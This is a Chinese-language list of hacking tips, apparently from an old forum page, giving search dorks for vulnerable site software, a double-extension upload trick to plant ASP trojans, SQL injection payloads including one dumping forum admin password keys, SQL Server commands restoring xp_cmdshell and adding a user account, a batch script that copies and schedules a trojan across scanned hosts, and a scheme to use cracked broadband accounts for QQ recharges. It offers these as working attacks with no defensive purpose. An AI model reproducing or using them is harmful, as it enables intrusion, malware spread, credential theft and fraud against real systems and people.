漏洞
在baidu 搜索powered by: sailingstudio websITe manage system 5.0 (sp1)
利用动画看http://soft.77169.com/62/20050530/6824.html
16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~
17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/
工具下载www.hack6.com
地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
工具使用方法动画和所有文件
http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811
20.缺少xp_cmdshell时
尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理员
21.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com
23.dv7.1用还原数据功能 还原asa木马
24.凡人网络购物系统v6.0 可以%5c暴库
25.ipb2.0.2漏洞 构造语句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 www.hack6.com有下载
26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间
27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.QQ.com/bbn/冲
28.搜索 企业上一页 [1] [2] [3] [4] 下一页
|
